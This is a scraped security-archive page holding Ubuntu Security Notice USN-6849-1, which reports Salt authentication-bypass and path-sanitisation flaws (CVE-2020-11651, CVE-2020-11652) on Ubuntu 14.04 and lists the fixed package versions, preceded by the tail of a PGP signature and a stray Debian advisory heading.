NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Ra0w/7BHBmDTLHRfXymGImQAh7e7QnVf2jliLZQKK//LuavYD0ts7ooPO7rHtF  
h/1iEw9/VIbj1D6FYsTfD3hD63YISgy0+NbygFqviiE/QYEt4V6GvGUbR8hhb0iZ  
6fMKJcwBxfjCa8XOK/k9vK8tkrmEdF5dxGYyUOxeRGSpMoJyIFFdiQzTvtPTLVgf  
Q3kwznZjrSsFodM3Cwh8fpSf0qwJxQ5cRdll0lQ5YAJnZAs7tmOvI1gJWzr60xC+  
iJNlc2BuKJpDbWGcd4hKLttmzfm1Awgg79xRbkWH4o36+gFz7XsPWDhUg8eUnAKJ  
LYkkNB7THyVj8iOKl657eVOWwK0mpWe9v8aq1JFOkIJ9/544DZo6OqJBli1CH/vO  
xRmol8AVGogBCNTRi+eG30aVfA3EMmf20qH+BIUOmb9CYwRAxIyOOT1TBHx5UCay  
V/JuF4LxajBGcYLavQg8ajD23UssEX+JOy/COG7jgUFrbzqaGYD+fn5iCmPoNaP9  
09mP2s9xUn2E5Q9/B7JOn/bG9wpRm9lYFKUZJ0gGYZDLtOC77cf7Etc0TsSs9258  
rZotSV30e81nxmz4w2Myv06acP11S51nMfm9EUMQkeK3j16IIco9zhpIcSbrHQDr  
gmkgrO16VfoRfWN5PovELosaYPDs3/zwS3ZJjENEYNQYBd2DrKk=  
=2Z9A  
-----END PGP SIGNATURE-----

Debian Security Advisory 5718-1

Ubuntu Security Notice 6849-1 - It was discovered that Salt incorrectly validated method calls and sanitized paths. A remote attacker could possibly use this issue to access some methods without authentication.

    ==========================================================================Ubuntu Security Notice USN-6849-1June 25, 2024salt vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTSSummary:Several security issues were fixed in Salt.Software Description:- salt: Infrastructure management built on a dynamic communication busDetails:It was discovered that Salt incorrectly validated method calls andsanitized paths. A remote attacker could possibly use this issue to accesssome methods without authentication. (CVE-2020-11651, CVE-2020-11652)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS   salt-common                     0.17.5+ds-1ubuntu0.1~esm2                                   Available with Ubuntu Pro   salt-master                     0.17.5+ds-1ubuntu0.1~esm2                                   Available with Ubuntu Pro   salt-minion                     0.17.5+ds-1ubuntu0.1~esm2                                   Available with Ubuntu ProAfter a standard system update you need to restart Salt to make all thenecessary changes.References:   https://ubuntu.com/security/notices/USN-6849-1   CVE-2020-11651, CVE-2020-11652

Source

Packet Storm